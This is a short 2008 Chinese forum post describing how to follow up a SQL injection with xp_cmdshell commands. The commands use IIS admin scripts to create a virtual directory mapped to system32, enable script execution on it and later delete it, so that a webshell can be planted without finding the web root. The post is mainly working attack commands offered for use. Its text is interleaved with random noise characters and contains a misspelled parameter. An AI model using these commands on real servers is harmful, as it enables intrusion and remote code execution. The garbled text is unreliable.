我爱电脑技术论坛 » 网络安全区 » SQL注入建立虚拟目录，免得找Web绝对路径

bbs23 发表于 2008-6-29 10:00

SQL注入建立虚拟目录，免得找Web绝对路径

我们很多情况下都遇到SQL注入可以列目录和运行命令，但是却很不容易找到web所在目录，也就不好得到一个webshell，这一招不错：xECSy,m,P&G@?

&X[%]2e'U;EG ?Z@ exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
ldd?;SmrR,V(g}{ 建立虚拟目录win,指向c:\winnt\system32
%]"T,GC},I.b@N KN exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
.gj8zW.?3O 让win句有解析asp脚本权限
{7x;Ia5~4i yt5~"y3\0^6@!S/L
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"7y;|4\5\gt#|%\I'Z
删除虚拟目录。8T:VnFJ.si
找不到web绝对路径的一种解决办法，&D^7Y.?GgO/Bo

aV1Fa/I f2y3v;A VO'r&N3h
403错误，表示虚拟目录建好了。。

查看完整版本: SQL注入建立虚拟目录，免得找Web绝对路径